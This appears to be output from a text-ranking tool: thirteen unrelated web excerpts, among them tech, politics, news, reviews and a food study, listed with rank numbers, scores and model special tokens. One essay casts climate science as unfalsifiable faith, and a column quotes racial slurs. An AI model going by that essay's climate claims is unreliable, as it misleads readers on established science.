Amazon has nailed the full package. + +By its own tally, Amazon has sold "tens of millions" of Echoes, Dots and other Alexa devices since coming to market in late 2014. In May, a top consumer-technology researcher, Bob O'Donnell of Technalysis Research, estimated that Amazon has won 70.9% market share in what he calls the smart-speaker sector. Google is second with about 26%; other aspiring contenders such as Apple, Microsoft and Samsung are still trying to organize their official launches. + +Time to peek behind the curtain. After interviewing a variety of Amazon Alexa insiders at both the company's Seattle headquarters and its Cambridge, Mass., research hub, I pieced together an analysis of Alexa's edge in an MIT Technology Review magazine article. + +Five factors stand out, including several that have surprisingly little to do with the actual speech science and AI inside Alexa.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 24; Score = 1130496.0 +<|begin_of_text|>Whether we know it or not, we are all of us, all the time, oppressed by the kind of power exercised, ostensibly at least, in the name of organising society and holding it together. When I think about “power” in this sense – of a vaguely oppressive force bearing down upon me – it’s easy to ignore its encroachment, or to brush any such nagging feelings aside and decide that my unease is a collateral price for other freedoms. This is lethal to the human person. + +Oppression of this kind is not something distant, but ever-present in my psyche and body. Much of it may well seem necessary, but sometimes it crosses a line. And the experiencing of that intrusion may in each of us arise differently: for one, in a “big” thing; for another, in a “small” thing. It’s always personal. Freedom is not necessarily epic. Only in the “I” – the absolute subjectivity which is my only accurate apparatus of judgment – can this be decided. No one else can make this decision for me. + +There are no small freedoms, but one great freedom, spread over the totality of a life in reality. + +In his essay The Power of the Powerless, Vaclav Havel took for granted this idea that freedom is not a matter of the absence of tanks in the streets. + +Havel was not, as is sometimes suggested, merely an “anti-communist” writer and intellectual whose work relates to one period of history. His themes, always, were universal, timeless, though demonstrated in a specific political and ideological context. His subject, really, was the soul of man under any kind of system seeking to extinguish it. + +A central motif of The Power of the Powerless is the story of the greengrocer required by the governing ideology to place a sign in his shop window bearing the slogan: “Workers of the World, Unite”. The sign, Havel observes, might just as easily read: “I am afraid and therefore unquestioningly obedient”, but this would cause the greengrocer to lose face. The message relates to the reigning ideology, which nobody really believes in, but its unquestioning promulgation becomes, for the greengrocer, both an outward show of loyalty and a way of saving face. By displaying the sign, the greengrocer has shown his willingness to enter into the prescribed ritual of pretence, colluding in his own enslavement, acquiescing in the “blind automatism which drives +================================================================================ +Rank = 25; Score = 1114112.0 +<|begin_of_text|>Emmanuelle Racine broke down in tears when she arrived to visit her grandfather at the Gatineau Hospital last week and found him naked and soiled. + +"He was completely naked, he was hiding himself with a little napkin," she said, describing 93-year-old Royal Racine, a Second World War veteran. + +"He was soaked in urine." + +Royal Racine had recently been hospitalized with pneumonia for the eighth time and cried out to the family, "I'm freezing," as they entered the room Oct. 19, she recalled. + +In addition to suffering pneumonia, the elderly man is incontinent and in the early stages of dementia. + +Emmanuelle Racine said she started to cry when she arrived at Gatineau Hospital Oct. 19 to find her 93-year-old grandfather naked, soiled and uncovered. (Radio-Canada) + +'How can they treat him like that' + +The nursing staff the family tracked down complained about missing personnel and told them he'd been left naked and uncovered for more than an hour, Emmanuelle Racine told Radio-Canada in a recent interview. + +"I started to cry because I was like, how can they treat him like that, you know?" she said. + +Royal Racine is being treated for pneumonia at Gatineau Hospital and is due to be released Friday. (CBC) + +And it wasn't the first time she'd found her grandfather soiled with no covers, she added. + +On another visit just days earlier on Oct. 14, she smelled the urine and waste before walking through the door, she said. + +When Royal Racine saw his granddaughter and son, Marcel Racine, he said, "Why are they doing this to me?" Emmanuelle Racine remembered. + +'What happens when we're not there?' + +On that occasion, nurses confirmed to the family Royal Racine had been left without covers or clothes since supper about two hours earlier, Marcel Racine said. + +The family has been reluctant to launch a formal complaint with the hospital while Royal Racine is still a patient there, out of fear his care will worsen. + +Instead, Marcel Racine wrote an email to Quebec Health Minister Gaétan Barrette, along with photos of his father, imploring the minister to investigate. The family has since received a response saying their letter was received. + +Emmanuelle Racine also took photos of her grandfather at the hospital on Oct. 14. (Emmanuelle Racine) + +"What happens when we're not there?" Marcel Racine told Radio-Canada. "I +================================================================================ +Rank = 26; Score = 1105920.0 +<|begin_of_text|>Contempt at court: Mother walking her baby in a pram and woman 'in her 40s' pull hair and draw blood during fierce fight outside Belfast trial + +Women got i nto altercation outside La ganside Cou rt in Belfast + +One woman in her 20's was with a baby in a pram at the time + +Security guard had to drag the pair apart and court staff took one inside + +Two women pulled each others hair, scratched and drew blood during a fight outside a court in Belfast. + +The violent altercation began after the unidentified pair, who are thought to have known each other, clashed outside Laganside Court in the Northern Irish capital. + +A security guard had to step in to separate the two women, who had each other in a fierce hold, before court staff escorted one inside for her own protection. + +Fierce: The older woman pulled on the other females hair during the violent altercation Pain: The red-haired woman tries to wriggle away from the grasp of the attacker Grab: The older woman goes for the throat of the mother, who was looking after her baby at the time + +One of the women, said to be in her 20s, was walking her young child in a pram alongside a male friend who allegedly shouted 'I am going to stamp on your son's head' to the other woman, said to be in her 40s. + +The older woman then ran over, grabbed her younger opponent and began to pull her hair. + +She then managed to draw blood before a security guard was forced to drag the pair apart. + +A witness outside the court said: 'One of the women was in her 40's and the other was in her 20's, it looked like they knew each other. + +'The woman with the red hair had a pram with a young baby inside. + +'A man she was with then shouted something like "I am going to stamp on your son's head". + +Hold: A security guard was forced to intervene and managed to separate the pair Injury: The red-haired woman was escorted into the court building with blood dripping from her eyebrow Gesture: The woman pointed at her opponent as she walked away from the scene + +'It was all over very quickly, security guards rushed in to break them up.' + +An ambulance was called to the scene, but the women had left before it arrived. + +Photographers captured the scrap while they covered the case of Marian McGlinchey, the Old Bailey bomber. + +A spokesman for the Police Service of Northern Ireland confirmed there had been an incident and added that +================================================================================ +Rank = 27; Score = 1097728.0 +<|begin_of_text|>Kitten, an American tabby residing in England, is a frustrated cat. He knows his place in the world: he was born to kill. Killing, after all, is what felines are supposed to do. Confined within his Lady's house, however, the young fellow is deprived of the opportunity to hunt live prey. The mansion is a sterile playground for a predator; offering nothing more than furniture which allows itself to be brutalized far too easily. The ambitious cat is bored and hungry for a challenge. + +Kitten learns of a passage hidden in his Lady's library: the Door, which leads to an unknown world. The cat has been told that the source of all evil dwells openly in this place. The feline is eager to fight the sinister personage and goes through the Door with no hesitation. + +The tabby finds himself in what appears to be a forest like any other in England. It doesn't take long for him to learn that this is a very different place. + +Written in the style of classic fantasies, this novel can be appreciated on different levels. To some readers, it's an allegorical tale: thought-provoking and filled with symbolism. To others, it's an adventure-filled page-turner. + +This book can be read as a stand-alone novel (doesn't end with a cliff-hanger) but there is a second (concluding) volume available entitled FINALE.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 28; Score = 1097728.0 +<|begin_of_text|>June 1, 2009 + +IF KIM Jong-Il has an imaginative public relations office, he'll issue a statement that setting off another nuclear weapon was due to a simple mistake as he was confused about which missile he'd registered as his second one, and it was all within the rules, but he's sorry if anyone's upset and it goes to show this ghastly system needs to be jolly well reformed. + +This would be more plausible than the now-famous interview by the member of parliament who protested that complaints about his expenses were driven by "jealousy" because his house "looks like Balmoral" and "does me nicely," ending with a flourish by snarling, "What right has the public to interfere in my private life? None." + +He was so absurdly beyond his own stereotype, if it had carried on he'd have said, "I require substantial grounds in order to carry out the annual event of hunting a farmhand and roasting him on a spit, and no do-gooder of common stock will tell me otherwise." + +But the most annoying thing when listening to these types is not their own arrogance, but that the mainstream view of modern Britain, including the idea on which New Labour was founded, is that class division belongs only in the past. + +Columnist: Mark Steel Mark Steel is a comedian, a columnist for the Independent newspaper, and a socialist and activist in Britain. He's the author of two collections about contemporary Britain, It's Not a Runner Bean: Dispatches from a Slightly Successful Comedian and Reasons to Be Cheerful--as well as Vive la Revolution: A Stand-up History of the French Revolution. + +So when you go past a housing office on a council estate that's full of disgruntled tenants, they must all be yelling, "When are you bastards gonna come and repair my duck island? It's three weeks since I reported it was leaking, where are my bleeding ducks supposed to rest when they're half way across my pond, they're getting knackered, now sort it." + +And Job Centers will be packed with claimants crying, "I can't survive on £68 invalidity benefit. Out of that I've got to pay for council tax, heating, food, moat cleaning, I've already got the portcullis going rusty, I'm desperate." + +And if a single parent on housing benefit was questioned about why they hadn't declared a morning's work, they could say to the fraud officer, "Do you know +================================================================================ +Rank = 29; Score = 1081344.0 +<|begin_of_text|>This is a rush transcript. Copy may not be in its final form. + +AMY GOODMAN: President Donald Trump says he’ll make his announcement today on whether to pull the United States out of the landmark Paris climate accord, a decision environmentalists warn would be a crime against the future of the planet and humanity. On Twitter, Trump said he would make the announcement at 3:00 p.m. Eastern time in the White House Rose Garden, and ended his tweet with, quote, ”MAKE AMERICA GREAT AGAIN!” + +In 2015, nearly 200 nations agreed in Paris to the global accord to curb rising greenhouse gas emissions blamed for warming the planet. The climate pact was heralded as a rare moment of international collaboration to avert imminent climate disaster. Now The Guardian is reporting China and the European Union plan to forge an alliance to take a leading role in tackling climate change, in response to Trump’s expected decision to pull out of the agreement. The new alliance will reportedly focus on leading the energy transition toward a low-carbon economy. An early draft of the announcement from the two countries describes climate change as a national security issue and multiplying factor of social and political fragility. + +On Wednesday in Brussels, Belgium, members of the European Parliament booed reports that Trump will likely pull the U.S. out of the Paris accord. European Commission President Jean-Claude Juncker said the administration will have a hard time withdrawing. + +JEAN-CLAUDE JUNCKER: [translated] That’s not how it works. The Americans can’t just leave the climate protection agreement. Mr. Trump believes that, because he doesn’t get close enough to the dossiers to fully understand them. It would take three to four years after the agreement came into force in November 2016 to leave the agreement. So this notion—”I am Trump, I am American, America first, and I am going to get out of it”—that won’t happen. + +AMY GOODMAN: On Wednesday, the United Nations tweeted, “Climate change is undeniable. Climate action is unstoppable. Climate solutions provide opportunities that are unmatchable.” As the world awaits Trump’s final decision, leaders from Brussels to Beijing reaffirmed their commitment to implement the Paris climate accord, and urged the United States not to become a global pariah. This is the German ambassador to the U.S., Peter Wittig, speaking to the PBS NewsHour. + +PETER WITTIG: We have been a staunch advocate of the Paris Agreement. We think it’s a landmark achievement. It’s +================================================================================ +Rank = 30; Score = 1040384.0 +<|begin_of_text|>If I believed the Earth was slowly turning into cheddar cheese, I could invoke this theory to explain a lot of things. Why is the rat population in our major cities growing so quickly? Earth cheesification is providing more rat food. Why have there been so many earthquakes lately? The cheesification of the tectonic plates has made them less resistant to sudden shifts. Why are glaciers melting? The freezing point of cheddar cheese is lower than that of water; as the Earth at the poles undergoes cheesification, the unfrozen cheese is causing a slight warming of the ice sheets from below, resulting in unusual levels of melting. + +Then we would be at liberty to publish headlines such as this : “Research suggests warmer summers could be causing colder winters.” This conjecture, brought to you via the magical theory of global climate change, is reported as though it is the most plausible explanation of the peculiar fact that Canadian winters do not appear to be getting any warmer. + +If, however, we could devise a theory that might literally be able to repel absolutely any possible counter-evidence, then we would have accomplished something truly diabolical: an unfalsifiable theory. If we could indeed devise such a theory, then we could run wild explaining anything and everything, and absorb absolutely any eventuality, without ever needing to question our faith in the underlying hypothesis. + +I could go on like this for a long time, I suppose. At some point, however, you would confront me with some natural fact that I could not logically account for by means of my cheese theory. In other words, even the greatest faith in this underlying assumption could never withstand all possible evidence. + +Question you aren’t supposed to ask: Why is the non-warming of recent winters a peculiar fact in need of an explanation? After all, did anyone in the past harbor any presumption that winters ought to be getting warmer? Why should they? The difference, of course, is that in the age of global warming, everyone is supposed to know, beyond any doubt, that the Earth is indeed getting significantly warmer. Thus, every time someone casually observes that the weather is pretty chilly, or that there has been a lot of snow, all hearers in the room look at their hands awkwardly, smirk bemusedly, or display some other symptom of that feeling familiar to anyone who has had to face doubts about a deeply held religious belief: “But this just can’t be true, because if it is, then my world is about to crumble.” + +The world of anthropogenic global +================================================================================ +Rank = 31; Score = 1028096.0 +<|begin_of_text|>Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings. + +Nov. 28, 2016, 2:52 PM GMT / Updated Nov. 29, 2016, 4:07 AM GMT By Alexander Smith + +A mother and daughter whose tweets have offered heartbreaking insight into Syria's civil war were "on the run" Monday as the pro-regime troops pushed into a rebel-held area of Aleppo. + +Seven-year-old Bana al-Abed and her mother, Fatemah, have provided dispatches from the front line and gained some 140,000 Twitter followers. + +Related: 'Bye': Terrified Family Tweeting From Inside Aleppo Says Farewell + +Fatemah told NBC News last month how her daughter had "started to ask me if we are going to die in the bombings." + +On Monday, following an intensifying attack by the forces of President Bashar al-Assad, Fatemah tweeted that she had been injured when her home was bombed the night before and that her family is now "on the run." + +She also shared that her daughter was frightened for her life. The tweet came a day after a photo of a dust-covered and clearly shocked Bana was also posted. + +Later Monday, the account posted: "We have no home now. I got minor injury. I didn't sleep since yesterday, I am hungry. I want to live, I don't want to die. — Bana." + +Fatemah later told NBC News' Richard Engel Monday night that they were relatively safe at a friends house and Bana was sleeping. + +This photo, provided by her mother, shows Bana sleeping relatively safe and sound in Aleppo, Syria, on November 28, 2016. NBC News + +"She didn’t sleep last night and all the day because there is always bomb and warplane in the sky," Fatemah said of her daughter. + +"Aleppo is bleeding, really it’s bleeding, Aleppo it's suffering very much," she said. + +"We are under siege for some three months... the people here are suffering from hunger, and now they are suffering from bombs, they don’t know how... how they deal with this, this, inhumanity," she added. + +Related: Syria's Rebels May Have Just Suffered Debilitating Defeat + +According to a United Nations report, nearly a million Syrians are living under siege in Aleppo, and officials have described the situation as "a slaughterhouse."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 1019904.0 +<|begin_of_text|>Article by: Anthony Florez + +Spoilers ahead! Spoilers ahead! Spoilers ahead! + +The Door is, in my opinion, the first great episode of season six. With the Kingsmoot hastily completed the Ironborn’s role in the greater game is finally established. Jon and Sansa are setting out to liberate the north, without the aid of Littlefinger (although I have a feeling the Knights of the Vale won’t be packing up and heading home just yet). Arya has a new assignment at Assassin Academy, which still feels middling, but that’s alright. And things took a turn for the crazy pants up at Holy Tree Fort where Bran pulled a bonehead move that brought the Undead Army down around everyone’s ears. The big revelation, however, was the simultaneous origin and fate of Hodor and- stop looking at me, I’m not crying, you’re crying, stupid jerk-face with your face of a jerk. + +Deanerys is rolling out once again with an even bigger army of primitives but not before sending Jorah the Andal off on what may be his final mission: find a cure for the greyscale infection that is slowly turning him into The Thing from those awful Fantastic Four movies. Call me a big ole sap but there is something trite but compelling about, “I love you. I’ll always love you. Now I have to leave, bye forever.” Even with Daario waiting in the wings with an expression that seemed to say, “I am still going to be hitting that, though, right.” Probably, Daario. But keep it in your banana-hammock until we get back to Mereen. You just know that guy wears bikini underwear. + +Tyrion has made an interesting decision to enlist the support of a new friend in the form of a Red Priestess of the Lord of Light. I like that Varys confronts the woman and makes an interesting case about fanaticism directly to her face and like any true zealot she is only more certain of herself and her belief. This whole idea feels like making a wish on a cursed monkey’s paw and hoping for the best, nothing good happens when asking for help from religious crazies or do we need to ask Stannis Baratheon how that turns out. Granted, Melisandre is a lot more tolerable now that she isn’t advocating kid fires but that’s only because she’s experienced real doubt and loss of purpose. This Red Lady in Mereen still has that crazy lady sheen to +================================================================================ +Rank = 33; Score = 1003520.0 +<|begin_of_text|>A man in a white coat, smiles, offers an injection to an infant who is alone. “Innoculation is the perfect Medication” he tells the child after dancing and singing with a syringe. The nurse tells the children elsewhere that if they are vaccinated with the MMR they won’t get the Measles, Mumps and Rubella. Will it hurt asks the boy, well it might says DR Ranj, but you can cry if you want to. Without waiting for an OK, the doc injects the boy who says “I am not ready for my ‘jection”, but the doc marvels“I have already done it”. (sic) + +Even if you didn’t see the TV show described above – and I didn’t – you probably sense the writer of that description didn’t approve of it and you probably won’t be surprised that the doctor and infant in question looked something like this: + +In case you missed it, only one of the characters in the above pic is real and he is a real-life medical doctor, Dr Ranj. The CBeebies Get Well Soon series is aimed at pre-school children. According to comments from parents about the series on the Dr Ranj fb page, toddlers love the show, which is intended to “help children understand their bodies and to see the medical world as an environment in which they feel safe”. (Source) + +The series has covered a range of uncontroversial conditions like verruccae, constipation and conjunctivitis. I was unaware of it until I got wind of some 60 or so complaints to the BBC about the content of an episode called, Inject to Project. Cue much bristling and hissing from those who say, + +“Vaccination is the longest running hoax perpetrated by Allopathy, the most pernicious, and the most dangerous thing that your children will ever face.” + +That quote appears on many websites, including the one called ‘Arnica UK Parents Support Network’, which is run by Anna Watson, who authored the above passage and who is apparently spearheading the campaign to complain about the show. + +Anna challenges whether it is legal “to promote medicines to children suggesting that they are 100% safe” and whether it is ethical “to promote medicines to children suggesting that they are 100% effective”. + +This presumably refers to the bit where the show’s ‘Nurse Morag’ is telling a group of infants that the MMR jabs will stop them getting the measles, mumps and rubella, not the bit where the +================================================================================ +Rank = 34; Score = 999424.0 +<|begin_of_text|>The opinions expressed by columnists are their own and do not represent the views of Townhall.com. + +Donald Trump once called the Rev. Al Sharpton "a con man," meaning that Sharpton plays the race card less out of sincerity and more as a method to make demands and extract concessions. + +But has there ever been a bigger legislative con man than the soon-to-be-retired Rep. Charlie Rangel, D-N.Y., currently the second-longest serving member of the House? His glossary of race-baiting is exhaustive. Just a few examples: + +In criticizing the Republican-run house, Rangel said, "It's not'spic' or 'n-----' anymore. (Instead) they say, 'Let's cut taxes.'" + +In accusing the then-President of racism, Rangel said "George (W.) Bush is our Bull Connor" (referring to the racist Southern lawman who sicced dogs and turned water hoses on civil rights marchers). + +In accusing the Republican Party in general of racism, Rangel said, "Everything we believe in, everything we believe in, (Republicans) hate. They don't disagree -- they hate.... Some of them believe that slavery isn't over and that they won the Civil War." + +On the tea party, Rangel said: "(Obama) really thought -- and maybe it was the water they drink at Harvard -- that he could deal with the tea party. They are mean, racist people. Now why do I say that? Because in those red states, they're the same slaveholding states -- they had the Confederate flag. They became Dixiecrats -- they had the Confederate flag. They're now the tea party." + +And: "(The tea party) is the same group we faced in the South with those white crackers and the dogs and the police. They didn't care about how they looked. It was just fierce indifference to human life that caused America to say enough is enough. 'I don't want to see it and I am not a part of it.' What the hell?! If you have to bomb little kids and send dogs out against human beings, give me a break." + +Yet now as the clock winds down on his career, Rangel is free -- free to tell the truth about "race." Rangel, in assessing why Hillary Clinton lost the race to Donald Trump, rejects the analysis advanced by the losing Clinton camp. At the Harvard post-election symposium, top Clinton aides accused Trump campaign manager Kellyanne Conway of blatantly courting America's white rac +================================================================================ +Rank = 35; Score = 995328.0 +<|begin_of_text|>There's no excuse for skipping out on fruits and veggies: The freezer aisle is full of 'em. Even if your favorite produce items are out of season, icy storage makes for freezing to fresh deliciousness almost as soon as you realize you're hungry. + +But you may be wondering, are those frozen veggies as good as the fresh ones? New research says yes, if not better. + +According to a study to be published in the June 2017 issue of the Journal of Food Composition and Analysis, some frozen fruits and vegetables may retain nutrients better than their fresh, refrigerated counterparts. + +Jean-Francois Monier/Getty Images A bear enjoys some frozen broccoli. + +"When considering the refrigerated storage to which consumers may expose their fresh produce prior to consumption, the findings of this study do not support the common belief of consumers that fresh food has significantly greater nutritional value than its frozen counterpart," the study, which was conducted by researchers from the University of Georgia in partnership with the Frozen Food Foundation — which has an obvious interest in promoting frozen foods — concluded. + +The two-year-long study looked at the storage of blueberries, strawberries, corn, broccoli, cauliflower, green beans, green peas and spinach, analyzing their nutrients on the day of purchase, five days after being stored in the refrigerator and in frozen form. + +"Our research shows that frozen fruits and vegetables are nutritionally equal to — and, in some cases, better than — their fresh-stored counterparts," UGA professor Dr. Ronald Pegg said in a news release. "In particular, Vitamin A was greater in frozen fruits and vegetables than select fresh-stored fruits and vegetables." + +How does freezing keep the nutrients in? + +A technique called fresh freezing, which freezes the vegetables as soon as they're ready instead of letting them sit on a truck or crate before being unpacked at a grocery store and then toted home, is what locks in those nutrients. + +"Frozen vegetables are usually nutritionally equivalent to fresh vegetables because they're generally flash-frozen onsite, immediately after harvest," registered dietitian Emily Braaten, explained via email. "This kind of 'processing' may degrade some nutrients while making others more bioavailable." + +Are we gaining enough nutrients to compensate for what we're losing in the freezing process? + +"These changes are [insignificant] to the average consumer," Braaten said. "The important thing is to increase your intake of vegetables, regardless of the source." + +So, should you switch from fresh to frozen? + +Skipping over those blanket-like hydroponic lettuce leaves and red, juicy summer strawberries +================================================================================ +Rank = 36; Score = 991232.0 +<|begin_of_text|>While working with Burger King, Adar said he's even had to sign a legal document saying he didn't alter anything. Chick-fil-A demanded that he use its procedures. + +"Most companies today want it to be fresh, natural, not overworked," Adar said. + +McDonald's, Burger King, Starbucks, Chipotle and Yum Brands didn't respond to CNBC email requests for comment about the practice of food styling. A Chick-fil-A spokeswoman said the company isn't sure it would "be a fit for this story" since it takes a different approach to using food in its commercials, which often center on cows advising people to 'eat mor chikin.' + +A Wendy's spokesman said about food stylists, "We supply the same ingredients to them as our restaurants receive. We also require that they prepare and build the products to operational procedures. The big difference is how much time we take to get an appealing shot." + +In a statement, Dunkin' Donuts Spokeswoman Michelle King said, "Dunkin' Donuts always uses real Dunkin' Donuts product in our advertisements. Our shoot director and food stylist team build the products to the exact specifications provided by Dunkin' Donuts' chefs to match what will be sold in our restaurants. We strive to ensure the authenticity of our products in our advertising." + +On the regulatory side, Federal Trade Commission spokeswoman Betsy Lordan told CNBC by email that truth in advertising laws do apply to restaurant menu items displayed in ads. The commission examines both what's implied by and stated in an ad to determine whether it's deceptive. + +"There are no specific FTC regulations governing food photos used in advertising, and the FTC has not pursued any cases alleging that food ads are deceptive based only on the photos," she wrote. + +If, for example, customers see that McDonald's fries look different in person than in an ad, that would not cause the same regulatory concern as a false claim that a product has special properties, like reducing the risk of 